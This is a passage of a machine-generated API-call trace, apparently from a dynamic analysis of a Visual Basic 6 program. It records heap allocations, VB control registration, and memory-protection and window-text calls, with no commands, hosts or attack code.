RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x120) returned 0x2c73370 [0165.058] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x60) returned 0x2c73498 [0165.058] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x250) returned 0x2c73500 [0165.059] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c73758 [0165.059] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c73778 [0165.059] lstrlenA (lpString="VB") returned 2 [0165.059] lstrlenA (lpString="CommandButton") returned 13 [0165.059] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x11) returned 0x2c73898 [0165.060] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c738b8 [0165.060] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xd4) returned 0x2c738e8 [0165.060] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x44) returned 0x2c739c8 [0165.060] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1c8) returned 0x2c73a18 [0165.060] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c73be8 [0165.061] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c73c08 [0165.061] lstrlenA (lpString="VB") returned 2 [0165.061] lstrlenA (lpString="Timer") returned 5 [0165.061] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c73d28 [0165.061] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xc) returned 0x2c73d40 [0165.061] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x30) returned 0x2c73d58 [0165.061] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x4) returned 0x2c73d90 [0165.061] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9c) returned 0x2c73da0 [0165.061] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c73e48 [0165.062] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c73e68 [0165.062] lstrlenA (lpString="VB") returned 2 [0165.062] lstrlenA (lpString="Printer") returned 7 [0165.062] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xb) returned 0x2c73f88 [0165.062] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xdc) returned 0x2c73fa0 [0165.063] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c74088 [0165.063] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c740a8 [0165.063] lstrlenA (lpString="VB") returned 2 [0165.063] lstrlenA (lpString="Form") returned 4 [0165.063] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x8) returned 0x2c741c8 [0165.063] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x184) returned 0x2c741d8 [0165.063] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x7c) returned 0x2c74368 [0165.063] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x2f8) returned 0x2c743f0 [0165.094] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c73178, Size=0x50) returned 0x2c746f0 [0165.094] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c73178 [0165.094] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c731c8, Size=0x50) returned 0x2c74748 [0165.095] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c747a0 [0165.097] lstrlenA (lpString="VB") returned 2 [0165.097] lstrlenA (lpString="Screen") returned 6 [0165.097] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xa) returned 0x2c731c8 [0165.097] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x2c) returned 0x2c748c0 [0165.097] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xa0) returned 0x2c748f8 [0165.098] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c749a0 [0165.098] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c749c0 [0165.098] lstrlenA (lpString="VB") returned 2 [0165.098] lstrlenA (lpString="Clipboard") returned 9 [0165.098] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xd) returned 0x2c731e0 [0165.098] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x1c) returned 0x2c74ae0 [0165.098] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x68) returned 0x2c74b08 [0165.099] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c74b78 [0165.099] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c74b98 [0165.099] lstrlenA (lpString="VB") returned 2 [0165.099] lstrlenA (lpString="MDIForm") returned 7 [0165.099] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xb) returned 0x2c74cb8 [0165.099] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x184) returned 0x2c74cd0 [0165.099] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x7c) returned 0x2c74e60 [0165.100] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x2f8) returned 0x2c74ee8 [0165.100] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c751e8 [0165.101] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c75208 [0165.101] lstrlenA (lpString="VB") returned 2 [0165.101] lstrlenA (lpString="App") returned 3 [0165.101] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x7) returned 0x2c73198 [0165.101] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x84) returned 0x2c75328 [0165.101] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x148) returned 0x2c753b8 [0165.101] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c75508 [0165.102] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c75528 [0165.102] lstrlenA (lpString="VB") returned 2 [0165.102] lstrlenA (lpString="UserControl") returned 11 [0165.102] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xf) returned 0x2c75648 [0165.102] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x1e4) returned 0x2c75660 [0165.102] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xb0) returned 0x2c75850 [0165.102] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x3a4) returned 0x2c75908 [0165.102] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c746f0, Size=0x78) returned 0x2c75cb8 [0165.103] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c746f0 [0165.103] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c74748, Size=0x78) returned 0x2c75d38 [0165.103] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c75db8 [0165.103] lstrlenA (lpString="VB") returned 2 [0165.103] lstrlenA (lpString="PropertyPage") returned 12 [0165.103] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x10) returned 0x2c74710 [0165.103] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x190) returned 0x2c75ed8 [0165.104] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x88) returned 0x2c76070 [0165.104] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x310) returned 0x2c76100 [0165.104] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0165.104] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c74728 [0165.105] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c76418 [0165.105] lstrlenA (lpString="VB") returned 2 [0165.105] lstrlenA (lpString="UserDocument") returned 12 [0165.105] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x10) returned 0x2c74748 [0165.105] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x1c8) returned 0x2c76538 [0165.105] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xa8) returned 0x2c76708 [0165.105] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x370) returned 0x2c767b8 [0165.105] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c74760 [0165.106] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x20) returned 0x2c81398 [0165.107] RtlAllocateHeap (HeapHandle=0x3fc0000, Flags=0x8, Size=0x30) returned 0x3fc08f0 [0165.108] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xa0) returned 0x2c813c0 [0165.108] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c81468 [0165.108] GetCurrentThreadId () returned 0xba4 [0165.108] GetCurrentThreadId () returned 0xba4 [0165.108] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c74780 [0165.109] RtlAllocateHeap (HeapHandle=0x3fc0000, Flags=0x8, Size=0x30) returned 0x3fc0928 [0165.109] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xa0) returned 0x2c81498 [0165.109] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c81540 [0165.109] GetCurrentThreadId () returned 0xba4 [0165.109] GetCurrentThreadId () returned 0xba4 [0165.109] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81570 [0165.109] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c81588 [0165.109] lstrlenA (lpString="VB") returned 2 [0165.109] lstrlenA (lpString="Label") returned 5 [0165.109] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c816a8 [0165.109] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x34) returned 0x2c816c0 [0165.110] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xf0) returned 0x2c81700 [0165.110] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x48) returned 0x2c817f8 [0165.110] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1f4) returned 0x2c81848 [0165.110] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c81a48 [0165.115] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c81a68 [0165.116] lstrlenA (lpString="VB") returned 2 [0165.116] lstrlenA (lpString="Frame") returned 5 [0165.116] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c81ba0 [0165.116] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x24) returned 0x2c82388 [0165.116] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xb0) returned 0x2c823b8 [0165.116] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x34) returned 0x2c82470 [0165.116] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x184) returned 0x2c824b0 [0165.117] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82658 [0165.117] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c82e40 [0165.117] lstrlenA (lpString="VB") returned 2 [0165.117] lstrlenA (lpString="CheckBox") returned 8 [0165.117] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xc) returned 0x2c81bb8 [0165.117] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c82f60 [0165.117] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xec) returned 0x2c82f90 [0165.118] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x48) returned 0x2c83088 [0165.118] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1f8) returned 0x2c830d8 [0165.118] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c75cb8, Size=0xa0) returned 0x2c832d8 [0165.118] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82678 [0165.119] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c75d38, Size=0xa0) returned 0x2c83380 [0165.119] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83428 [0165.119] lstrlenA (lpString="VB") returned 2 [0165.119] lstrlenA (lpString="OptionButton") returned 12 [0165.119] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x10) returned 0x2c81bd0 [0165.119] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c75cb8 [0165.119] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xd4) returned 0x2c83548 [0165.119] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x4c) returned 0x2c75ce8 [0165.119] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1c8) returned 0x2c83628 [0165.120] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82698 [0165.120] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83810 [0165.120] lstrlenA (lpString="VB") returned 2 [0165.121] lstrlenA (lpString="ComboBox") returned 8 [0165.121] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xc) returned 0x2c81be8 [0165.121] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x108) returned 0x2c857f8 [0165.121] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x4c) returned 0x2c75d40 [0165.121] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x230) returned 0x2c85908 [0165.121] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c826b8 [0165.122] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83938 [0165.122] lstrlenA (lpString="VB") returned 2 [0165.122] lstrlenA (lpString="ListBox") returned 7 [0165.122] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xb) returned 0x2c81c00 [0165.122] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x108) returned 0x2c85b40 [0165.122] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x54) returned 0x2c85c50 [0165.122] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x230) returned 0x2c85cb0 [0165.122] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c826d8 [0165.123] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83a60 [0165.123] lstrlenA (lpString="VB") returned 2 [0165.123] lstrlenA (lpString="HScrollBar") returned 10 [0165.123] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xe) returned 0x2c81c18 [0165.123] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x24) returned 0x2c85ee8 [0165.123] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x90) returned 0x2c85f18 [0165.123] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c85fb0 [0165.123] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x144) returned 0x2c85fe8 [0165.124] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c826f8 [0165.124] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83b88 [0165.124] lstrlenA (lpString="VB") returned 2 [0165.124] lstrlenA (lpString="VScrollBar") returned 10 [0165.124] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xe) returned 0x2c81c30 [0165.125] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x24) returned 0x2c86138 [0165.125] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x90) returned 0x2c86168 [0165.125] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c86200 [0165.125] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x144) returned 0x2c86230 [0165.125] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c832d8, Size=0xc8) returned 0x2c86380 [0165.125] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82718 [0165.125] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c83380, Size=0xc8) returned 0x2c86450 [0165.126] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83cb0 [0165.126] lstrlenA (lpString="VB") returned 2 [0165.126] lstrlenA (lpString="DriveListBox") returned 12 [0165.126] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x10) returned 0x2c81c48 [0165.131] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c832d8 [0165.131] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xc0) returned 0x2c83308 [0165.131] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x40) returned 0x2c833d0 [0165.131] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1a0) returned 0x2c86520 [0165.131] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82738 [0165.132] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83dd8 [0165.132] lstrlenA (lpString="VB") returned 2 [0165.132] lstrlenA (lpString="DirListBox") returned 10 [0165.132] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xe) returned 0x2c81c60 [0165.132] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c866c8 [0165.132] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xc8) returned 0x2c866f8 [0165.132] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x50) returned 0x2c867c8 [0165.132] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1b0) returned 0x2c86820 [0165.133] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82758 [0165.133] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c83f00 [0165.133] lstrlenA (lpString="VB") returned 2 [0165.133] lstrlenA (lpString="FileListBox") returned 11 [0165.133] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xf) returned 0x2c81c78 [0165.133] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x28) returned 0x2c869d8 [0165.133] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xec) returned 0x2c86a08 [0165.133] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x58) returned 0x2c86b00 [0165.134] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1f8) returned 0x2c86b60 [0165.134] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82778 [0165.134] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c84028 [0165.134] lstrlenA (lpString="VB") returned 2 [0165.134] lstrlenA (lpString="Menu") returned 4 [0165.135] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x8) returned 0x2c83418 [0165.135] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x38) returned 0x2c86d60 [0165.135] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x4) returned 0x2c75d98 [0165.135] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xb8) returned 0x2c86da0 [0165.135] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82798 [0165.135] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c84150 [0165.136] lstrlenA (lpString="VB") returned 2 [0165.136] lstrlenA (lpString="Shape") returned 5 [0165.136] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c81c90 [0165.136] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x1c) returned 0x2c86e60 [0165.136] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x68) returned 0x2c86e88 [0165.136] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xfc) returned 0x2c86ef8 [0165.137] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c86380, Size=0xf0) returned 0x2c87000 [0165.137] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c827b8 [0165.137] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c86450, Size=0xf0) returned 0x2c870f8 [0165.137] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c84278 [0165.137] lstrlenA (lpString="VB") returned 2 [0165.137] lstrlenA (lpString="Line") returned 4 [0165.137] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x8) returned 0x2c75da8 [0165.137] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c827d8 [0165.137] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x50) returned 0x2c86380 [0165.138] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xd0) returned 0x2c863d8 [0165.138] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c827f8 [0165.138] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c843a0 [0165.138] lstrlenA (lpString="VB") returned 2 [0165.138] lstrlenA (lpString="Image") returned 5 [0165.138] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x9) returned 0x2c81ca8 [0165.139] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x24) returned 0x2c864b0 [0165.139] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x98) returned 0x2c871f0 [0165.139] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x34) returned 0x2c864e0 [0165.139] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x154) returned 0x2c87290 [0165.139] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82818 [0165.139] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c844c8 [0165.139] lstrlenA (lpString="VB") returned 2 [0165.139] lstrlenA (lpString="Data") returned 4 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x8) returned 0x2c873f0 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xd8) returned 0x2c87400 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x3c) returned 0x2c874e0 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1d8) returned 0x2c87528 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82838 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c845f0 [0165.140] lstrlenA (lpString="VB") returned 2 [0165.140] lstrlenA (lpString="OLE") returned 3 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x7) returned 0x2c87708 [0165.140] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x17c) returned 0x2c87718 [0165.141] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x40) returned 0x2c878a0 [0165.141] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x2f0) returned 0x2c878e8 [0165.141] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c82858 [0165.147] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x108c610 [0165.147] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x108f060 [0165.147] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x108e758 [0165.147] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x108ef50 [0165.147] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x1098d18 [0165.147] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0x108ebd0 [0165.147] IMalloc:Alloc (This=0x76da66bc, cb=0x7c) returned 0x1098d88 [0165.147] IMalloc:GetSize (This=0x76da66bc, pv=0x1098d88) returned 0x7c [0165.148] IMalloc:Alloc (This=0x76da66bc, cb=0x20) returned 0x10992c0 [0165.148] GetCurrentThreadId () returned 0xba4 [0165.148] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x54) returned 0x2c87be0 [0165.148] GetCurrentThreadId () returned 0xba4 [0165.149] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x10992e8 [0165.149] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x104) returned 0x2c87c40 [0165.149] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x6f8) returned 0x2c87d50 [0165.149] VirtualProtect (in: lpAddress=0x3e0000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x28fd30 | out: lpflOldProtect=0x28fd30*=0x20) returned 1 [0165.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3e0000, dwSize=0x6000) returned 1 [0165.150] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0165.150] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0165.151] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xd4) returned 0x2c88450 [0165.151] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0165.151] VirtualAlloc (lpAddress=0x3e0000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0165.152] VirtualProtect (in: lpAddress=0x3e0000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x28fd30 | out: lpflOldProtect=0x28fd30*=0x4) returned 1 [0165.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3e0000, dwSize=0xa000) returned 1 [0165.153] GetCurrentThreadId () returned 0xba4 [0165.153] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x23ec) returned 0x2c88530 [0165.198] SetWindowTextA (hWnd=0x103de, lpString="Using Shell32.dll") returned 1 [0165.198] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0xc, wParam=0x0, lParam=0x28fca4) returned 0x1 [0165.198] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fc8c | out: phkResult=0x28fc8c*=0x0) returned 0x2 [0165.200] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0165.200] VirtualQuery (in: lpAddress=0x28f6b8, lpBuffer=0x28f69c, dwLength=0x1c | out: lpBuffer=0x28f69c*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0165.201] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0x10913d8 [0165.201] IMalloc:GetSize (This=0x76da66bc, pv=0x10913d8) returned 0x6c [0165.202] GetCurrentThreadId () returned 0xba4 [0165.202] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x104) returned 0x2c8a928 [0165.202] GetCurrentThreadId () returned 0xba4 [0165.202] RtlAllocateHeap 